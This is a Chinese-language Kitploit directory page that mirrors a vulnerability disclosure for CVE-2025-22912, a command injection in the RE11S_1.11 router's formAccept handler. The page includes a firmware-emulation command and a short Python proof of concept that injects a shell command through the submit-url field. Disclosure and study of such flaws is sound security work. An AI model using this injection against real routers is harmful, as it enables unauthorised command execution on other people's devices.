Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
RE11S_1.11-formAccept-CommandInjection — CVE-2025-22912 | Kitploit
工具/GitHubGitHub/passwa11/re11s_1.11-formaccept-commandinjection
嵌入式系统安全物联网安全漏洞分析漏洞利用Web应用程序漏洞利用模糊测试渗透测试命令与控制

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
passwa11/re11s_1.11-formaccept-commandinjection

RE11S_1.11-formAccept-CommandInjection

CVE-2025-22912

查看仓库
41年前尚未审核

RE11S_1.11-formAccept-CommandInjection

在奇安信天工实验室实习期间,我在 RE11S_1.11 路由器中发现了一个命令注入漏洞。

通过分析 bin 目录下的 webs 文件,我发现 formAccept 函数中包含一个命令注入漏洞。

该命令注入可通过 submit-url 键值触发,从而造成系统命令注入。

image-20241224100434040

如何仿真路由器

使用以下命令通过 firmAE 进行仿真。

root@kitploit:~
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.bin

poc.py 文件的内容如下:

root@kitploit:~
import requests

url = "http://192.168.9.2/goform/formAccept"
data = {
	"submit-url":"touch /tmp/xyq"
}

r = requests.post(url,data=data)
print(r.text)

攻击结果

image-20241224100515030

可以看到,执行后新增了一个 /tmp/xyq 文件,证明攻击成功。

下载工具